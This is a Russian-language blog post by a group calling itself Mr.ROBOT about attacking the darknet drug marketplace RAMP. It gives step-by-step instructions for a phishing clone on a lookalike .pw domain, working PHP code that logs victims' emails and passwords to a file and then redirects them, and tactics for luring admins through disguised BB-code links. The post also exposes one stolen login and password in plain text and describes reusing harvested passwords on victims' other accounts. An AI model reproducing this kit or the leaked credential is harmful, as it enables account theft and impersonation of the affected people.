Правда о RAMP'e. Взгляд изнутри.

Всем привет! И снова с вами команда Mr.ROBOT, как вы уже заметили, мы очень любим анализировать и ломать барыжные проект, которые продают запрещенные вещества. В прошлый раз мы поломали всеми известный форум ввв.narkop.com, их блог и 15 магазинов, которые продавали синтетические наркотики с 2010 года. Бэкапы выкинули тут. Соответственно раскрыли админа и суть его деяний, но об этом позже -)

Сегодня мы будет говорить о проекте RAMP "Russian Anonymous MarketPlace", который находится в ТОРе и позиционирует себя как надежная, безопасная площадка для продажи классических наркотиков (гашиш, марихуана, кокаин...) Забегая вперед скажу, что накрученный проект, с расчетливыми администраторами, которые явно не чисты на руку. Это мы сейчас и будем выяснять.

Подтверждение моих слов с источника http://lurkmore.to/Tor:

Последнее время участились случаи кидалова на RAMP. ЛС отключены, и пользователи не могут обмениваться инфой о продавцах и whatever else, автогарант отсутствует (с другой стороны, бесполезен, так как по факту наличие товара не проверяет, а только имеет процент от сделки, сидя дома на жопе, пока вы ковыряете «клад»), а обычный гарант (всё по той же жадности админов) стоит минимум 1500 рублей. При этом особо острые негативные отзывы кинутых неудачников трутся админами с завидной регулярностью. Такие неудачники отправляются в бан. В результате все условия располагают к процветанию мошенничества. Но, так или иначе, единственное место в руторе, где можно без особых усилий купить вещества.

Немного пояснений, кто не вкуривает:

RAMP - это проект с парой информационных разделов где обсуждают наркотики, все остальное это ветки магазинов, которые продают наркотики по всем городам России. Магазины платят администрации за рекламу, а другая сторона поставляет клиентов. Но на самом деле там засел один людоед, который получает 250 000$ в год якобы с рекламы, как он утверждает в интервью, которое можно почитать на Хабре. Хотя тоже похоже на купленную статью)

Darkside жалуется, что в России легально хорошо жить трудно, а эта его «зарплата» (которую в некоторых странах вполне возможно получать в качестве «белой») в переводе на рубли звучит прилично — 13 миллионов. Себя он называет не миллионером, а просто парнем, доход которого чуть выше, чем у среднего класса.

Конечно, если 1-2 ветки кидает, а остальные магазины вывозят клиентов и те тащат других , то ДА, можно делать и 30 000 000р. в месяц. Схема реально крутая, кто держит форумы меня поймут, только тут зависимость и огромный спрос) Но все это очень видно и такие форумы отмирают, а в замен приходят новые, более адекватные и интересные. Хватит трещать, переходим к действиям, так как все это не с проста. Вы обалдеете какой я дотошный)

Начинаем ковырять пациента

Итак, первое, что пришло мне в этот раз на ум, это фейк. Я вообще любитель веб уязвимостей, но посмотрев проект, мне показалось, что там все серьезно. PGP, все используют приватные блокнот, только жабберы, похож на силкроуд и почему то я подумал, что будет бесполезно бить в лоб, а лучше в этот раз использовать социальную инженерию)

Сборка Фейка RAMP'ы

Регаю домен viewtopic.pw и сделал ему поддомен с нормальным видом:

http://ramp2bombkadwvgz.onion.viewtopic.pw/index.php?id=34654

На вид получилось вкусно, например если попробовать скормить такой линк адмику от модератора, может прокатить.

Сама реализация проста.

1. Выкачиваем сайт с помощью браузера.

2. Сливаем иконку и прописываем в index.php, далее правим верстку, если где поплыло и инпуты формы.

3. Пишем скрипт на пхп, что бы писал логин и пароль, далее перенаправлял жертву по нужному урлу.

Код:

<?php

set_time_limit(0);

$file_log = 'logFUIfsyrafyto847rwdeufki.txt';

$email = $_POST['email'];

$pass = $_POST['pass'];

if (!empty($_POST['email']))

{

            $flog = fopen($file_log, 'a');
            if($flog){
                fwrite($flog, $email.';'.$pass."\r\n");
                fclose($flog);
    
                echo "<meta http-equiv='refresh' content='0;URL=http://ramp2bombkadwvgz.onion/viewtopic.php?id=1086' />"; //редирект после снифа
            } else {
                die('Failed to open file: '.$file_log);
            }


              //header( 'Location: http://y!!!', true, 301 );


}

?>

После того как я собрал фейк, я не сразу рванул в бой, я начал анализ изнутри. Около недели я общался с различными магазинами, смотрел их ветки, изучал даты регистрация, время постов, поведение, брал реквизиты и пытался выйти на общение.

Было понятно, что в топе 10 как минимум 5 магазинов одного владельца (с накрученными отзывам), которые ведут всего 2 саппорта. Это можно понять по манере общения, реквизитам, да и просто оформлению темы и пересечению ников с отзывами.

Сразу забегая в перед подчеркну один момент! Как выяснилось, многие магазины принадлежат одному человеку, который сажает туда работяг в виде саппорта и закладчиков, выдавая все остальное и руководя процессом. Я даю 99%, что это администрация или люди очень тесно связанные с ней)

Я развел на фейк сначала одного и потом всех по цепочки, саппортов было штук 10 как я понял. Смотрите, если смотреть на профили администраторов магазинов с главной, то у них в почты такого вида:

ramp@ramp

ramp@ramp

ramp@ramp2

Это не фотошоп, фейк реальный и на него купились кучу людей. Регнуть такие акки можно только через админку, если через интерфейс пишет ошибку.

Вот, что пришло в отчет

[SRC]leonidarkadyevich;f13f13g13haze[/SRC]

Логин и пасс магазина "Поле Чудес" с главной, давайте посмотрим его ЛС.

 Что мы тут видим?

1. Из пяти 3 клиентов за месяц, 3 ненахода и темы чистые, сообщения удаляют) Вот сцки, кидаю через хуй твари , а живут за счет нормальных магазинов , которые продают розницу и привлекают новых клиентов.

2. На форуме якобы 70 000 регистрация и есть активность, тогда посмотрите на даты и сообщения. 3 заказа за месяц! Это главная страница за 800$ в месяц, плюс 200$ квота за товар и регион, такой топ встает в 1000-1300$. Только за что там платить? Вы будете работать, а в соседней теме администрация будет кидать ваших клиентов на более серьезные суммы, так как и предложения там оптовые)

На фейк попалась не мало народу т.к я менял ссылки в подписи, я меня ссылки на моментальные магазины, фейк сувал везде и конверсия была хорошая)

Что то еще живое у меня осталось, так что пока не выкидываю.

Потом от этих магазинов была отправлена ссылка с подменой через бб-код URL админам и модерам ))) Администрация Рампы очень любит кидать и опускать людей, так я вам скажу.

Далее все собранные пассы я начал подбирать к почтам, жабберам из тем пострадавших. Анализ был плотный!

Были и нормальные селлеры, которые работают и тем самым подпитывают клиентами форум, а верхушка их в процессе кидают на опт от 100 000 до 800 000 рублей. Далее сваливая свои же ветки себе в арбитраж, но тщательно прочищая их.

Например вот блек на RAMP'у с этого форума, сумма кидка 70 000. Человек с кем то поработал пару раз и решил взять отп в самом первом вип магазине на форуме и его так банально кинули, почистили тему и сменили жаббер, что бы он не светился в поиски поплавок с меткой "КИДАЛА".

Далее в переписках я спалил где регаются моменталки, кто сколько платит за рекламу, кто кидает, а их реально много даже на луркморе написали про это, а там ребята объективные.

Автор: Mr.ROBOT

Оригинал статьи

Темная сторона интернета на канале Darknet.